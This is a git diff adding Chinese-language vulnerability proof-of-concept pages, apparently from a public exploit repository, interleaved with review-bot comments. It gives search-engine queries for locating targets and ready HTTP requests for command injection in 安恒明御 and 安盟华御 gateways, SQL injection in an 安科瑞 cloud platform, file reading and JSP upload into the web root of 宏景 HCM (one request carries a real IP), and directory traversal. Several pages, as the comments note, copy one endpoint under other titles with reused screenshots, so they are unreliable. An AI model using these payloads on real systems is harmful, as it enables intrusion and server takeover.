image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/jAKWW4JqUQbjCmHl/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-711461.png) + +获取命令执行结果 + +```plain +GET /sslvpn/stc.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/jAKWW4JqUQbjCmHl/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-296297.png) + + + +> 更新: 2024-07-17 17:29:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rdf0zo1tk2wbzg3g> \ No newline at end of file diff --git a/安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞.md b/安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞.md new file mode 100644 index 0000000..b2b2737 --- /dev/null +++ b/安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞.md 
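Review bot: the title names `aaa_local_web_preview`, but the request in 漏洞复现 still targets `g=aaa_portal_auth_wchat_submit`, the summary still says `aaa_portal_auth_wchat_submit`, and the screenshots (`1703405909643-...png`, `1703405938768-...png`) are the same files as in the `aaa_portal_auth_wchat_submit` entry, so this page never exercises the endpoint it is named after. Replace the `g=` value and the summary with the `aaa_local_web_preview` request and its own evidence.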
@@ -0,0 +1,41 @@ +# 安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞 + +# 一、漏洞简介 +安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 安恒明御安全网关 + +# 三、资产测绘 ++ hunter`app.name="安恒明御安全网关"` ++ 特征 + +![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/HWXRZk-Pt7bBvocS/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-137994.png) + +# 四、漏洞复现 +```plain +GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/HWXRZk-Pt7bBvocS/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-686075.png) + +获取命令执行结果 + +```plain +GET /sslvpn/stc.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/HWXRZk-Pt7bBvocS/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-026969.png) + + + +> 更新: 2024-07-17 17:22:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggogol4vip7aq8zc> \ No newline at end of file diff --git a/安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞.md b/安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞.md new file mode 100644 index 0000000..9e858ef --- /dev/null +++ b/安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞.md 
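Review bot: nothing in this file refers to `aaa_portal_auth_config_reset` except the title; the PoC line is `GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo...`, the 漏洞简介 names `aaa_portal_auth_wchat_submit`, and both images are reused from that entry. Either update the `g=` parameter, the summary and the screenshots to the `config_reset` handler, or fold this into one page that lists every vulnerable `g=` value.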
@@ -0,0 +1,41 @@ +# 安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞 + +# 一、漏洞简介 +安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 安恒明御安全网关 + +# 三、资产测绘 ++ hunter`app.name="安恒明御安全网关"` ++ 特征 + +![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/pzDedjkOanQCgUGN/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-416578.png) + +# 四、漏洞复现 +```plain +GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/pzDedjkOanQCgUGN/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-056323.png) + +获取命令执行结果 + +```plain +GET /sslvpn/stc.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/pzDedjkOanQCgUGN/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-647356.png) + + + +> 更新: 2024-07-17 17:28:17 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pb2c1ioegdqi8aft> \ No newline at end of file diff --git a/安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md b/安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md new file mode 100644 index 0000000..82af1c9 --- /dev/null +++ b/安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md 
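Review bot: same defect as the two preceding 安恒明御安全网关 files: the title says `aaa_portal_auth_local_submit`, while the request, the summary text and both screenshot files are copied unchanged from the `aaa_portal_auth_wchat_submit` entry (`g=aaa_portal_auth_wchat_submit` is still the handler being called). A reader following this page reproduces the wchat_submit bug, not the local_submit one; change the `g=` value and add evidence for that handler, or remove the file.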
@@ -0,0 +1,41 @@ +# 安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞 + +# 一、漏洞简介 +安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 安恒明御安全网关 + +# 三、资产测绘 ++ hunter`app.name="安恒明御安全网关"` ++ 特征 + +![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/z7xlIRA9OLdIal4a/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-021806.png) + +# 四、漏洞复现 +```plain +GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/z7xlIRA9OLdIal4a/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-625580.png) + +获取命令执行结果 + +```plain +GET /sslvpn/stc.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/z7xlIRA9OLdIal4a/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-616701.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dyx9hn4tquve8vku> \ No newline at end of file diff --git a/安恒明御安全网关sslvpn_client存在远程命令执行漏洞.md b/安恒明御安全网关sslvpn_client存在远程命令执行漏洞.md new file mode 100644 index 0000000..fb5ec3a --- /dev/null +++ b/安恒明御安全网关sslvpn_client存在远程命令执行漏洞.md 
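Review bot: this entry is the source that three siblings in this diff (`aaa_local_web_preview`, `aaa_portal_auth_config_reset`, `aaa_portal_auth_local_submit`) copy without changing `g=`; consider collapsing them into one page with a list of affected `g=` handlers. The `;` immediately after `suffix=` is the shell separator that makes the injection work and deserves a sentence, and the result file `/usr/local/webui/sslvpn/stc.txt` is left on the device with no cleanup step.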
@@ -0,0 +1,41 @@ +# 安恒明御安全网关sslvpn_client存在远程命令执行漏洞 + +# 一、漏洞简介 +安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关sslvpn_client存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 安恒明御安全网关 + +# 三、资产测绘 ++ hunter`app.name="安恒明御安全网关"` ++ 特征 + +![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/pZPH-MQGPlAnSTs8/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-374710.png) + +# 四、漏洞复现 +```plain +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1699939901505-2723aaa1-8c25-4f6b-9817-bdf3c6dd715a.png](./img/pZPH-MQGPlAnSTs8/1699939901505-2723aaa1-8c25-4f6b-9817-bdf3c6dd715a-272346.png) + +获取命令执行结果 + +```plain +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1699939937228-26653126-7961-44ef-bda2-0622411e755d.png](./img/pZPH-MQGPlAnSTs8/1699939937228-26653126-7961-44ef-bda2-0622411e755d-150327.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dg8qpqumcbgb7vgs> \ No newline at end of file diff --git a/安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞.md b/安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞.md new file mode 100644 index 0000000..dacde64 --- /dev/null +++ b/安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞.md 
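Review bot: the injection point is the `img` parameter of `sslvpn_client.php?client=logoImg`, where `x /tmp|echo ...|tee ...|ls` is spliced into a shell pipeline, but the page never says so; one sentence on why `|` is used as the separator here (versus `;` in the `aaa_portal_auth_*` entries) would help readers adapt the payload. The output is written to `/usr/local/webui/sslvpn/ceshi.txt` and no removal step is given. The identical request also appears under 威努特 and 安盟华御 in this diff, which suggests a shared OEM web UI; a cross-reference would be more useful than three copies.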
@@ -0,0 +1,39 @@ +# 安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞 + +# 一、漏洞简介 +安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 安盟华御应用防护系统 + +# 三、资产测绘 ++ fofa`body="./webui/js/jquerylib/" && icon_hash="-507802195"` ++ 特征![1701771919319-68c717ea-9581-4f52-a6b8-6fe95f714b73.png](./img/I4OS9Z4oQbmjVm3B/1701771919319-68c717ea-9581-4f52-a6b8-6fe95f714b73-598996.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/I4OS9Z4oQbmjVm3B/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-372549.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/I4OS9Z4oQbmjVm3B/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-769183.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cmv6rdoy8wqokzle> \ No newline at end of file diff --git a/安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞.md b/安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞.md new file mode 100644 index 0000000..46dc7fd --- /dev/null +++ b/安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞.md 
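Review bot: both screenshots here (`1701762310844-e2bb6845-...png` and `1701762342384-224cbced-...png`) are the same image files used in the 威努特 `sslvpn_client` entry, so they are not evidence that the payload works against 安盟华御; add captures from an actual 安盟华御 target or state that reproduction was not done independently. The `ceshi.txt` artifact is again left in the web root without a cleanup note.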
@@ -0,0 +1,23 @@ +# 安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞 + +AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术,实时采集企业总用电、生产设备及环保治理设备用电数据,通过关联分析、超限分析、停电分析、停限产分析,结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况,同时通过数据分析还可以实时监控限产和停产整治企业运行状态,用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。 + +## fofa + +```javascript +body="myCss/phone.css" +``` + +## poc + +```javascript +GET /MainMonitor/GetEnterpriseInfoById?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241128094044951](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280940008.png) \ No newline at end of file diff --git a/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md b/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md new file mode 100644 index 0000000..a00acd4 --- /dev/null +++ b/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md 
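Review bot: the payload is a wide `UNION ALL SELECT NULL,...` with a `CONCAT(0x716a627871, 0x647a45..., 0x7178767171)` marker in one column and a trailing `%23` comment, i.e. a sqlmap-style MySQL union probe, but the page does not say what a positive response looks like. Decode the hex (`qjbxq` ... `qxvqq`) and state that the marker string appearing in the JSON response confirms injection; also mention that the column count is tied to the query behind this endpoint and may change between versions, so readers running sqlmap should let it detect the count or pass `--union-cols`.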
@@ -0,0 +1,26 @@ +# 安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞 + +AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术,实时采集企业总用电、生产设备及环保治理设备用电数据,通过关联分析、超限分析、停电分析、停限产分析,结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况,同时通过数据分析还可以实时监控限产和停产整治企业运行状态,用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。 + +## fofa + +```javascript +body="myCss/phone.css" +``` + +## poc + +```javascript +POST /MainMonitor/GetEnterpriseInfoY HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: text/plain, */*; q=0.01 + +EnterpriseId=2107265665700008%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cuser%28%29%29%29and%27&Type=4 +``` + +![image-20241227215812734](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272158792.png) \ No newline at end of file diff --git a/安科瑞环保用电监管云平台newLogin存在SQL注入漏洞.md b/安科瑞环保用电监管云平台newLogin存在SQL注入漏洞.md new file mode 100644 index 0000000..77fe6e3 --- /dev/null +++ b/安科瑞环保用电监管云平台newLogin存在SQL注入漏洞.md 
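Review bot: the payload `EnterpriseId=2107265665700008'and/**/extractvalue(1,concat(char(126),user()))and'&Type=4` is error-based, so the success indicator is a MySQL `XPATH syntax error: '~<user>@<host>'` message in the response; say so, because the screenshot alone does not tell readers what to look for. The value `2107265665700008` looks like an ID copied from one deployment; state whether an existing ID is required or replace it with a placeholder. The file name and title say `etEnterpriseInfoY` while the endpoint is `GetEnterpriseInfoY`.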
@@ -0,0 +1,30 @@ +# 安科瑞环保用电监管云平台newLogin存在SQL注入漏洞 + +AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术,实时采集企业总用电、生产设备及环保治理设备用电数据,通过关联分析、超限分析、停电分析、停限产分析,结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况,同时通过数据分析还可以实时监控限产和停产整治企业运行状态,用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。 + +## fofa + +```javascript +body="myCss/phone.css" +``` + +## poc + +```javascript +POST /Home/newLogin HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Content-Length: 193 + +data=AmILgROn2omEYq%2Bd8Urox8DW%2F8rRQwsBzOEz00K3cyMY1DhHq6oDzKni9uNo6p7VIuEZBk0edl%2Blr8MukZeYaoj5ogyFWf1wJQ6iDSwIHOKSdk2%2BRRo%2FbhB70T5AlQ3PB6Ca1I6PvvVefK%2BuEF6b%2BqnvUH5y0gix7tq3yw1WJdc%3D +``` + +![image-20241129104833102](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411291048146.png) + +![image-20241129104733314](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411291047374.png) \ No newline at end of file diff --git a/宏景-DisplayFiles任意文件读取.md b/宏景-DisplayFiles任意文件读取.md new file mode 100644 index 0000000..5d098ec --- /dev/null +++ b/宏景-DisplayFiles任意文件读取.md @@ -0,0 +1,20 @@ +## 宏景DisplayFiles任意文件读取 + +## fofa +``` +app="HJSOFT-HCM" +``` + +## poc +``` +POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +filepath=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT +``` +![image](https://github.com/wy876/POC/assets/139549762/3466b302-c1fc-42c9-929f-5d35500f13bd) + +### 加解密工具 +https://github.com/vaycore/HrmsTool 
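Review bot: the only payload in the 安科瑞 `newLogin` entry is an opaque blob `data=AmILgROn2omEYq...` that is evidently encrypted or encoded client-side; without the scheme, the key and the plaintext that was sent, nobody can reproduce this against another target or vary the injection. Document how `data` is built (the front-end routine and the cleartext parameters inside it) or include a decoded example; as submitted, the screenshots are the only evidence and the entry is not actionable.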
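Review bot: in the 宏景 `DisplayFiles` entry the `filepath=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJF...` value is an encoded path and the page points to `https://github.com/vaycore/HrmsTool` for the codec, but it never says which file that sample decodes to, so readers cannot tell what the screenshot shows or how to target a different file. State the plaintext path and the expected response, and explain why the request goes through `/templates/attestation/../../` instead of straight to `/servlet/DisplayFiles`.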
diff --git a/宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞.md b/宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞.md new file mode 100644 index 0000000..4010227 --- /dev/null +++ b/宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞.md 
@@ -0,0 +1,89 @@ +# 宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞 +宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞,可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## hunter +```javascript +app.name="宏景 HCM" +``` + +## poc +1、获取cookie + +```java +GET /module/system/qrcard/mobilewrite/qrcardmain.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773798906-c8ff7525-ae32-4aba-9f46-3941013a3ed1.png) + +2、获取上传路径 + +```java +POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 +Cookie: JSESSIONID=3199B98D03F1834F83CDAF45EA079D13 +Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r + +------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="path" + + +------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="lfType" + +0 +------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="logofile"; filename="" +Content-Type: image/gif + +<%= "bttest1" %> +------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="twoFile"; filename="" +Content-Type: image/gif + +<%= "bttest1" %> +------WebKitFormBoundaryfjKBvGWJbG07Z02r-- +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773863549-7fb35968-9e26-40b2-ae25-54b275c9d806.png) + +3、文件上传 + +```java +POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1 +Host: 8.137.169.49:7000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 +Cookie: JSESSIONID=163CC9FFC3CAAEAFCF07F29B294E99F0 +Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r + +------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="path" + +D~3a~5cTomcat~39~5cwebapps~5cROOT~5ctest1.jsp 
+------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="lfType" + +0 +------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="logofile"; filename="" +Content-Type: image/gif + +<%= "bttest1" %> +------WebKitFormBoundaryfjKBvGWJbG07Z02r +Content-Disposition: form-data; name="twoFile"; filename="" +Content-Type: image/gif + +<%= "bttest1" %> +------WebKitFormBoundaryfjKBvGWJbG07Z02r-- +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773904485-b641a3a5-ca59-4bc8-bfdf-e00f229fbd30.png) + +4、访问/test123.jsp + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773974901-93ca11e0-40df-493e-bee1-ac24a62bea27.png) + + + diff --git a/宏脉医美行业管理系统config存在目录遍历漏洞.md b/宏脉医美行业管理系统config存在目录遍历漏洞.md new file mode 100644 index 0000000..cfe927f --- /dev/null +++ b/宏脉医美行业管理系统config存在目录遍历漏洞.md @@ -0,0 +1,25 @@ +# 宏脉医美行业管理系统config存在目录遍历漏洞 + +# 一、漏洞简介 +宏脉医美行业管理系统是由宏脉信息技术(广州)股份有限公司开发的一款服务于医美行业管理服务的系统.宏脉医美行业管理系统config存在目录遍历漏洞 + +# 二、影响版本 ++ 宏脉医美行业管理系统 + +# 三、资产测绘 ++ hunter`web.title="宏脉医美行业管理系统"` ++ 特征 + +![1704262762802-ebd6b894-53ce-40a3-b2bb-ac6ab6dec428.png](./img/rNM2nXI92D5k_q50/1704262762802-ebd6b894-53ce-40a3-b2bb-ac6ab6dec428-973442.png) + +# 四、漏洞复现 +```plain +/config +``` + +![1706786956453-a3b09163-fd17-47ea-ab3e-99f586bc9e0a.png](./img/rNM2nXI92D5k_q50/1706786956453-a3b09163-fd17-47ea-ab3e-99f586bc9e0a-778894.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/era5zxcl98y54nu2> \ No newline at end of file diff --git a/宝塔云WAFserver_name存在SQL注入漏洞.md b/宝塔云WAFserver_name存在SQL注入漏洞.md new file mode 100644 index 0000000..5f446e3 --- /dev/null +++ b/宝塔云WAFserver_name存在SQL注入漏洞.md 
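Review bot: step 4 of the 宏景 uploadLogo hunk says to visit `/test123.jsp`, but the `path` field in step 3 writes `D~3a~5cTomcat~39~5cwebapps~5cROOT~5ctest1.jsp`, so the two filenames disagree; use one name in both steps. The step 3 request also carries a real address in `Host: 8.137.169.49:7000` while every other request in the hunk leaves `Host:` blank, and the `JSESSIONID` values in step 2 and step 3 differ without the text saying they are the cookie obtained in step 1; replace the address with a placeholder and mark the cookie as the step 1 value. The `hunter` query is fenced as javascript and the HTTP requests as java, neither of which applies; the other files in this commit use plain fences for both.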
